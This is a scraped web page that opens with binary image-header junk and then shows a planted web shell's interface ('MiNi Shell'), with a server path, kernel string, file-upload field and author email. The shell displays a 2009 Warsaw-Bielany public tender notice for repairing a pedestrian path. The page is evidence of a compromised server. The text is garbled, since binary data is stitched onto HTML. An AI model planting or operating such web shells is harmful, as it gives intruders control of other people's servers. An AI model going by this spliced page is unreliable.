JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/12358-N-2009.html

<p class="kh_header"><b>Warszawa: Remont ciągu pieszego od ul. Staffa do ul. Gąbińskiej w Warszawie.</b><br>
<b>Numer ogłoszenia: 12358 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa - Dzielnica Bielany , ul. Przybyszewskiego 70/72, 01-824 Warszawa, woj. mazowieckie, tel. 022 8651935, faks 022 8644857.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielany.waw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ciągu pieszego od ul. Staffa do ul. Gąbińskiej w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa ciągu pieszego z remontem oświetlenia zewnętrznego wzdłuż ciągu pieszego, urządzeniem zieleni pobocza ciągu pieszego. Przedmiot zamówienia obejmuje roboty rozbiórkowe (rozebranie istniejącej nawierzchni z płyt betonowych, krawężników,  ław pod krawężniki z betonu, demontaż istniejących słupów oświetleniowych wraz z oprawami, wywiezienie gruzu z rozbieranych konstrukcji), wykonanie koryta, ułożenie warstw konstrukcyjnych, ułożenie nawierzchni z kostki brukowej betonowej, regulacja pionowa studzienek, oznakowanie pionowe i poziome, przebudowa oświetlenia polegająca na wymianie kabla oświetleniowego w rurze ochronnej, słupów i opraw oświetlenia zewnętrznego, roboty naprawcze i towarzyszące, urządzenie zieleni polegającej na karczowaniu drzew, sadzeniu nowych drzew i krzewów, założenie trawników . 
Wykonanie i odbiór robót będą się odbywały w oparciu o:
a)dokumentację projektową, 
b)specyfikację techniczną wykonania i odbioru robót;
c)dokumenty, o których mowa w art. 30 ustawy - Prawo zamówień publicznych;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7, 45.23.32.22-1, 45.31.61.00-6, 77.21.14.00-6, 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 5.000,00 zł. (słownie; pięć tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.2.1) O udzielenie zamówienia mogą ubiegać się wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 i 2 oraz  spełniający warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku (tekst jednolity Dz. U. z 2007 r. Nr 223 poz.1655 ze zmianami) a także: 
a)	Zamawiający wymaga, aby wykonawca wykazał, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, należycie wykonał:
- jedno zamówienie (jedno zamówienie = jedna umowa) obejmujące roboty budowlane w zakresie budowy  drogi lub jej części o nawierzchni z kostki brukowej (np. parkingi, chodniki, zatoki postojowe) wraz z budową oświetlenia zewnętrznego drogi lub jej części, o wartości zamówienia brutto minimum 500 000,00 zł., 
lub dwa zamówienia (jedno zamówienie = jedna umowa)
- jedno zamówienie, obejmujące roboty budowlane, w zakresie budowy drogi lub jej części o nawierzchni z kostki brukowej (np. parkingi, chodniki, zatoki postojowe), o wartości zamówienia brutto minimum 320 000,00 zł; 
i jedno zamówienie, obejmujące roboty budowlane w zakresie budowy oświetlenia zewnętrznego drogi lub jej części, o wartości zamówienia brutto minimum 180 000,00 zł. 

Wymogiem jest aby wykazane zamówienie (a) były poparte dokumentem (ami) o należytym ich wykonaniu np. referencje.

(termin budowa oznacza również przebudowę, rozbudowę, remont, modernizację).

b) Zamawiający wymaga, aby wykonawca dysponował osobami do kierowania robotami będącymi przedmiotem zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do kierowania robotami będącymi przedmiotem zamówienia, którymi wykonawca będzie dysponował, tj.
- kierownika budowy z uprawnieniami budowlanymi do pełnienia samodzielnej funkcji technicznej w budownictwie w specjalności drogowej 
oraz kierownika robót z uprawnieniami budowlanymi w specjalności sieci elektryczne, 
którzy są wpisani na listę członków Okręgowej Izby Inżynierów Budownictwa, w oparciu o ustawę z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów oraz urbanistów.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą /spełnia - nie spełnia/ w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.2.2) 
1)Oświadczenie, że wykonawca spełnienia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych - wg wzoru w zał. Nr 3 do SIWZ;
2)Oświadczenie, że wykonawca nie podlega wykluczeniu z art. 24  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych - wg wzoru w zał. Nr 3a do SIWZ; 
3)dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4) Wykaz obejmujący zamówienie(nia), o którym(ch) mowa w Części III ust.1 pkt. 2 lit. a) - sporządzony wg wzoru w załączniku nr 4 do SIWZ 
5) Dokument(y) potwierdzający(e) należyte wykonanie zamówienia(eń) opisanego(ych) w Części III ust.1 pkt.2 lit. a) - np. referencje.
6) Wykaz - wskazanie osób do kierowania robotami będącymi przedmiotem zamówienia, którymi wykonawca dysponuje lub będzie dysponował, opisanych w Części III ust. 1 pkt 2 lit. b) SIWZ - wg wzoru w zał. nr 5 do SIWZ,
W przypadku gdy w ww. wykazie wykonawca wskazał osoby którymi będzie dysponował, to wymogiem jest załączenie pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do kierowania robotami będącymi przedmiotem zamówienia. 
7) Kopie uprawnień budowlanych dla ww. osób oraz zaświadczenia z właściwej Izby Samorządu Zawodowego potwierdzające ich przynależność do Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składnia ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z ww. Izby oraz dowodu dokonania należnych składek, z którego wynika, że są one opłacone na dzień składania ofert. 

Inne dokumenty wymagane w postępowaniu 
1)Wypełniony druk OFERTA - zgodny w treści ze wzorem stanowiącym załącznik nr 1 do SIWZ;
2)Formularz cenowy - zgodny w treści ze wzorem stanowiącym załącznik nr 2 do SIWZ;
3)Pełnomocnictwo, w sytuacji gdy wykonawcę reprezentuje pełnomocnik lub w przypadku złożenia oferty wspólnej, zgodnie z wymogami opisanymi w Części III pkt. 3 SIWZ. 

Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności których nie można było przewidzieć w chwili zawarcia umowy, tj.:
a)zmiana siedziby Wykonawcy lub Zamawiającego;
b)zmiana inspektora nadzoru - w sytuacjach losowych;
c)zmiana kierownika robót - w sytuacjach losowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bielany.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Wydziale Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok.5, (cena 54,50 zł.).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2009 godzina 11:00, miejsce: Wydział Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok. Nr 5..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com